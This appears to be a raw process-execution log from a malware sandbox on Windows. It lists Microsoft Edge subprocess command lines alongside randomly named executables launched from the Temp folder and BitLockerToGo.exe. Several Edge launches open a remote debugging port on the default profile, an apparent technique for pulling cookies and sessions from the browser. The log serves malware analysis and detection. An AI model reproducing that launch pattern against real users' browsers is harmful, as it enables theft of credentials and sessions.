"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3360 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2848 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1312226905027184980,14790259171978717531,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4552 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2320 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2796 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3300 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2448 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3840 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3936 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2444 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,13938139889500840509,11375849991452073203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4448 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2676 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2232 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3304 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3312 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2717193195484486838,10499801410587595981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4332 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2788 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2792 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2792 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

